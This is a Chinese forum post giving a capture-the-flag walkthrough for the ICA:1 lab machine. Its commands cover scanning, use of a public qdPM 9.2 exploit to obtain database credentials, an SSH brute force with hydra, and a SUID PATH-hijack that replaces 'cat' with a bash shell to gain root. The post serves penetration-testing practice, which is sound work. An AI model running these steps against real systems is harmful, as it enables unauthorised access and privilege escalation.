ICA:1靶场

打印 上一主题 下一主题

主题 854|帖子 854|积分 2562

ICA:1靶场


目录

机器信息:
靶机:192.168.142.129
攻击机:192.168.142.132
一、主机发现

arp-scan -l
或者
nmap -sP 192.168.142.0/24
二、端口扫描

nmap -sV -p- 192.168.142.129
或者
nmap -A -p- 192.168.142.129
三、渗透提权阶段

(1)查询框架漏洞:
searchsploit qdpm 9.2
(2)找到对应文件:
locate php/webapps/50176.txt
或者
find / -name 50176.txt
(3)通过50176.txt中的方法找到了数据库用户名和密码
(4)登录数据库查询用户信息
(5)用数据库拿到的信息进行ssh爆破
hydra -L user.txt -P password.txt ssh://192.168.142.129
(6)确定用户账号和密码,ssh进行登录
(7)得到提示,找查可执行文件
find / -perm -u=s 2>/dev/null
(8)通过strings查看文件中的字符
strings /opt/get_access
(9)发现存在setuid、system、cat /root/system.info等字眼
(10)修改环境变量来提权
vim /tmp/cat
echo "/bin/bash" > /tmp/cat
chmod +x /tmp/cat
export PATH=/tmp:$PATH
echo $PATH
(11)执行文件,成功提权
/opt/get_access
(12)提权后删除/tmp/cat文件
(13)到/root目录下拿到flag
参考资料:
https://www.cnblogs.com/sainet/p/15656589.html
https://juejin.cn/post/7067099039526813703

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
回复

使用道具 举报

0 个回复

倒序浏览

快速回复

您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

我爱普洱茶

金牌会员
这个人很懒什么都没写!

标签云

快速回复 返回顶部 返回列表